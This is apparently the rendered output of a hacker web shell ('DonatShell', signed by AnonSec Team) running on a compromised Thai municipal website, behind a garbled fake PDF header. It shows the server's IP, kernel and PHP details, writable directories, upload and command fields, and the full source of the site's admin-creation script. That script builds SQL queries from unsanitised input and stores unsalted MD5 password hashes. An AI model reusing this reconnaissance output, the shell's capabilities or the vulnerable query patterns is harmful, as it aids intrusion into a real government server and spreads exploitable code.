%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.155.177.87  /  Your IP : 122.155.177.87
Web Server : Apache/2
System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64
User : apache ( 994)
PHP Version : 5.3.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/thungkhana/domains/thungkhanan.go.th/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/thungkhana/domains/thungkhanan.go.th/public_html/admin/add_admin.php
<?
session_start();

if( !isset($_SESSION["user"]) || !isset($_SESSION["passwd"]) ){
	session_destroy();
	$message="س Login ͹ !";
	$url="index.php";
	include "alert.php";
	die;exit;
}

require_once('Connections/conndb.php');

$pass5 = md5($_SESSION["passwd"]);
$uname = $_SESSION["user"];
$ulevel = $_SESSION["level"];

$query_m = "select * from tbl_admin where user_name='$uname' and user_password='$pass5' ";
$result_m = mysql_query($query_m) or die(mysql_error());
$num_rows = mysql_num_rows($result_m);
if ($num_rows > 0 )
{
	$chk_add = $_POST["chk_add"];
	if($chk_add==1){
		//	
		if($ulevel==1){
			$u_name = $_POST["u_aname"];
			$u_name = trim($u_name);
			if(Empty($u_name) or !isset($u_name) or ($u_name=="")){
				include("Connections/close_db.php");
				echo "ERROR  empty value <p><a href='add_admin.php#top'>Back to Main</a></p>"; die;
			}
			$sql = "select user_name from tbl_admin where (user_name='$u_name') ";
			$dbquery = mysql_query($sql) or die("Can't send query !!");
			$num_rows = mysql_num_rows($dbquery);
			if($num_rows > 0) {
				include("Connections/close_db.php");
				echo "<br /><h3><p align=\"center\"><font color='#FFFFFF'>'User name : '".$u_name." 㹰ҹ ö</font></p></h3><br />";
				echo "<p align=\"center\"><a href=\"add_admin.php#top\">Ѻ˹к</a></p><br />";
				die;
			}else
			{
				$now = date("Y-m-d H:i:s",time());
				$pass = trim($_POST["u_apassword"]);
				$pass = md5($pass);
				$u_level = $_POST["u_alevel"];
				$u_firstname = $_POST["u_afirstname"];
				$u_lastname = $_POST["u_alastname"];
				$u_phone = $_POST["u_aphone"];

				$sql = "insert into tbl_admin (id,user_name,user_password,user_level,user_firstname,user_lastname,user_phone,udate,user_update) values ('','$u_name','$pass','$u_level','$u_firstname','$u_lastname','$u_phone','$now','$uname')";
				$dbquery = mysql_query($sql) or die("Can't send query !A");
			}
		} else {
			include("Connections/close_db.php");
			echo "<br /><h3><p align=\"center\"><font color='#FFFFFF'>'User name' ".$uname." öк</font></p></h3><br />";
			echo "<p align=\"center\"><a href=\"main.php\">Ѻ˹ѡ</a></p><br />";
			die;
			//echo "<Script language=\"javascript\">window.location=\"admin.php\"</script>";
		}
	}
	  
?>   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">     
<html><!-- InstanceBegin template="/Templates/template_a.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>                                                                                                    
<!-- InstanceBeginEditable name="doctitle" -->

<!-- InstanceEndEditable --> 
<?php
require_once('Connections/conndb.php'); 
mysql_select_db($database_conndb, $conndb);
?>
<title>ͧúǹӺŷ觢ҹ  99/9  1 Ӻ 觢ҹ  ´ ѧѴ ѹ :: www.thungkhanan.go.th</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../styles.css" rel="stylesheet" type="text/css">
<!-- InstanceBeginEditable name="head" --><style type="text/css">
<!--
a:link {
	text-decoration: underline;
}
a:visited {
	text-decoration: underline;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: underline;
}
-->
</style><!-- InstanceEndEditable -->


<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color: #3CFFFF;	
}
-->
</style>

<!--styles -->
<link href="../styles.css" rel="stylesheet" type="text/css" />
<link href="../css/Hover%20Buttons.css" rel="stylesheet" type="text/css"/>
<link href="../css/Hoverable-Sidenav.css" rel="stylesheet" type="text/css"/>
 <!--<script src="https://platform-api.sharethis.com/js/sharethis.js#property=5d255a83d97c100012d80679&product='inline-share-buttons' 
async='async"  type='text/javascript'> -->
   </script>
<!--styles -->


<style type="text/css">
<!--
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
.style6 {color: #FFFFFF}
-->
</style></head>

<body  background="../images/0bg1-edit1.png" style="background-repeat:no-repeat; background-position:top">




<!-- content -->
<div align="center">
  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td align="center" valign="top"><tr>
        <td height="" align="center" valign="top"><iframe src="/head-slider.html" width="100%" height="627" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe></td>
      </tr>
      <tr>
        <td align="center" valign="top">&nbsp;</td>
      </tr>
      </td>
    </tr>
    <tr>
      <td align="center" valign="top"><table width="980" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td align="center" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td align="center" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td align="center" valign="top"><!-- InstanceBeginEditable name="EditRegion3" -->
          <table width="95%" border="0" cellspacing="0">
          <tr align="center" >
            <td height="22" align="left" class="styles1">&nbsp;</td>
          </tr>
          <tr align="center" >
            <td height="22" align="left" class="styles1"><div align="right" style="color:#ffffff;"><a href="main.php#top" class="styles1" style="color:#ffffff;">˹ Admin</a> | 
			<?if($ulevel==1){?>
				<a href="add_admin.php#top" class="styles1" style="color:#ffffff;">żк</a>
			<?} else {?>
				<a href="changepass.php#top" class="styles1" style="color:#ffffff;">¹ʼҹ</a>
			<?}?>
			| <a href="signout.php" class="styles1" style="color:#ffcc00;">͡ҡк </a></div></td>
          </tr>
          <tr>
            <td align="center" valign="top">&nbsp;</td>
          </tr>
          <tr>
            <td align="center" valign="top">
			<table width="100%" cellspacing="0" cellpadding="0">
                <tr>
                  <td valign="top">
				  <table width="100%" border="0" cellpadding="2" cellspacing="2" bgcolor="#FFFFFF" class="box1">
                    <tr>
                      <td width="100%" height="25" background="../images/bg4.gif" class="styles" ><div align="center" class="title3">к</div></td>
                    </tr>

					<form name="form1" method="post" action="add_admin.php#top" onSubmit="return check();" autocomplete="off">
					  <tr> 
						<td>

						  <table width="100%" border="0" cellspacing="2" cellpadding="2" align="center">
						  <tr>
							<td colspan="2">&nbsp;</td>
						  </tr>
						  <tr>
							<td align="right" width="35%">User name :: &nbsp;</td>
							<td><input type="text" name="u_aname" id="u_aname" size="30" maxlength="25" required placeholder="user name" autocomplete="cc-name"></td>
						  </tr>
						  <tr>
							<td align="right">ʼҹ :: &nbsp;</td>
							<td><input type="password" name="u_apassword" id="u_apassword" size="30" maxlength="35" required placeholder="password" autocomplete="cc-password"></td>
						  </tr>
						  <tr>
							<td align="right">׹ѹʼҹ :: &nbsp;</td>
							<td><input type="password" name="c_apassword" id="c_apassword" size="30" maxlength="25" required placeholder="confirm password" autocomplete="cc-conpassword"></td>
						  </tr>
						  <tr>
							<td align="right">дѺҹ :: &nbsp;</td>
							<td>
								<select name="u_alevel" id="u_alevel">
								<option value="2">2</option>
								<option value="1">1</option>
								</select>
							<!--<input type="text" name="u_alevel" id="u_alevel" size="2" maxlength="1" >--></td>
						  </tr>
						  <tr>
							<td align="right"> :: &nbsp;</td>
							<td>
							<input type="text" name="u_afirstname" id="u_afirstname" size="30" maxlength="30" ></td>
						  </tr>
						  <tr>
							<td align="right">ʡ :: &nbsp;</td>
							<td><input type="text" name="u_alastname" id="u_alastname" size="30" maxlength="30" ></td>
						  </tr>
						  <tr>
							<td align="right"> :: &nbsp;</td>
							<td><input type="text" name="u_aphone" id="u_aphone" size="30" maxlength="25" ></td>
						  </tr>
						  <tr>
							<td colspan="2">&nbsp;</td>
						  </tr>
						  <tr>
							 <td colspan="2" align="center">
								<input type="hidden" name="chk_add" value="1"> 
								<input type="submit" name="Submit" value="ѹ֡">
							 </td>
						  </tr>
						  <tr>
							<td colspan="2">&nbsp;</td>
						  </tr>
						  </table>
					  </td>
					  </tr>
					</form>

					  <tr bgcolor="#6699CC"> 
						<td align="center"><font  color="#FFFFFF"><b>ʴżк</b></font></td>
					  </tr>
					  <tr>
					  <td  valign="top">

					  <table width="100%" align="center" cellspacing="0" cellpadding="0" height="23" frame="below" >
					  <tr bgcolor="#CCCCCC">
					  <td width="10%">&nbsp;
					  </td>
					  <td width="15%">User name
					  </td>
					  <td width="35%">-ʡ
					  </td>
					  <td width="10%" align="center">User ID
					  </td>
					  <td width="10%" align="center">level
					  </td>
					  <td width="20%">
					  </td>
					  </tr>
					  </table>

					<table width="100%" border="0" align="center" cellspacing="2" cellpadding="1" bgcolor="#CCCCCC">
					 <? 
					
					$sql = "select * From tbl_admin where (id > 0) ";
					$sql .= "Order by id Asc ";

					/* 駤 ʴŵ˹ $Per_Page */
					$item = 0;
					$Per_Page =30;
					if(!$_GET['Page']){
						$Page=1;
					}else{
						$Page = $_GET['Page'];
					}
					$Prev_Page = $Page-1;
					$Next_Page = $Page+1;
					$result = mysql_query($sql);
					$Page_start = ($Per_Page*$Page)-$Per_Page;
					$Num_Rows = mysql_num_rows($result);
					if($Num_Rows<=$Per_Page)
					$Num_Pages =1;
					else if(($Num_Rows % $Per_Page)==0)
					$Num_Pages =($Num_Rows/$Per_Page) ;
					else 
					$Num_Pages =($Num_Rows/$Per_Page) +1;
					$Num_Pages = (int)$Num_Pages;
					if(($Page>$Num_Pages) || ($Page<0))
					print "<center><b>ѧբ<b></center>";
					//print "<center><b>ӹǹ $Page ҡ $Num_Pages ѧբͤ<b></center>";
					$sql .= "LIMIT $Page_start , $Per_Page";
					//ǹʴ
					$result = mysql_query($sql);
					$item = ($Page-1) * $Per_Page;

					While($row= mysql_fetch_assoc($result)){
					$item = $item + 1;
					$code_id = $row["id"];
					$code_1 = $row["user_name"];
					$code_2 = $row["user_firstname"];
					$code_3 = $row["user_lastname"];
					$name = $code_2." ".$code_3;
					$code_4 = $row["user_level"];
					$code_5 = $row["user_phone"];

					$bcolor = "#ffffff";
					if(($item %2)==0){
						$bcolor = "#e5e5e5";
					}

					?>

					<tr bgcolor="<?=$bcolor;?>">
					<td width="5%">
					<div align="center">
					<?
					echo "<a href='edit_admin.php?code_id=$code_id#top'></a>";
					?>
					</div>
					</td>
					<td width="5%">
					<div align="center">
					<?
					if($code_id>1){
						echo "<a href='del_data.php?code_id=$code_id&chk_p=1&code_1=$code_1#top'>ź</a>";
					}
					?>
					</div>
					</td>
					<td width="15%">
					<?= $code_1;?>
					</td>
					<td width="35%">
					<?= $name;?>
					</td>
					<td width="10%" align="center">
					<?= $code_id;?>
					</td>
					<td width="10%" align="center">
					<?= $code_4;?>
					</td>
					<td width="20%">
					<?= $code_5;?>
					</td>
					</tr>

					<?}?>
					</table>
					<hr align="center" width="100%" noshade size="1">
					<div align="right">
					к : 
					<?= $Num_Rows." ";?>&nbsp
					<!--ӹǹ˹ҷ : <b> -->
					<?//=$Num_Pages;?>
					<? if($Num_Rows>30){ echo "˹ : ";}?>
					<?/* ҧ͹Ѻ */

					if($Prev_Page) 
					echo " <a href='$PHP_SELF?Page=$Prev_Page'><< ͹Ѻ </a>";
					$Show_Page = 10;
					$i1 = $Page / $Show_Page;
					$i2 = $Page % $Show_Page;
					$i1 = (int)$i1;
					for($i=1; $i<=$Num_Pages; $i++)
					{
						if($i != $Page)
						{
							if($i1 > 0)
							{
								$i3 = (($Show_Page * $i1) + $i2) - $Show_Page;
								$i3 = $i3 + 1;
								if(($i >= $i3) && ($i < $Page))
									echo "[<a href='$PHP_SELF?Page=$i'>$i</a>]";
							}else
							{
								if($i <= $Show_Page)
									echo "[<a href='$PHP_SELF?Page=$i'>$i</a>]";
							}
						}
						else
						{
							if($i > 1){
								echo "<b> $i </b>";
							}
						}
					}
					/*ҧԹ˹ */
					if($Page!=$Num_Pages)
					echo "<a href ='$PHP_SELF?Page=$Next_Page'> ˹ҶѴ>> </a>";
					?>
					
					</div>

					  </td>
					  </tr>

				  </table>
				  </td>
				</tr>
              </table>
			  </td>
          </tr>
          <tr>
            <td align="center" valign="top">&nbsp;</td>
          </tr>
        </table>
      <!-- InstanceEndEditable --></td>
        </tr>
      </table></td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top" style="background-repeat:no-repeat"><img src="../images/foot.png"></td>
    </tr>
  </table>
</div>
<!-- end_content -->

<tr><td><a style="display:scroll;position:fixed;bottom:5px;right:5px;" class="backtotop" href="#top" rel="nofollow" title="Back to Top"><img src="../images/up.png" border="0" /></a></td>
</tr>








<map name="Map6" id="Map6"><area shape="rect" coords="210,1,302,41" href="http://www.tratlocal.go.th/index.php" target="_blank" />
</map>
</body>
<!-- InstanceEnd --></html>
<?
	include("Connections/close_db.php");
} else {
	session_destroy();
	include("Connections/close_db.php");
	$message="Username or Password Incorrect !";
	$url="index.php";
	include "alert.php";
}
?>

Anon7 - 2022
AnonSec Team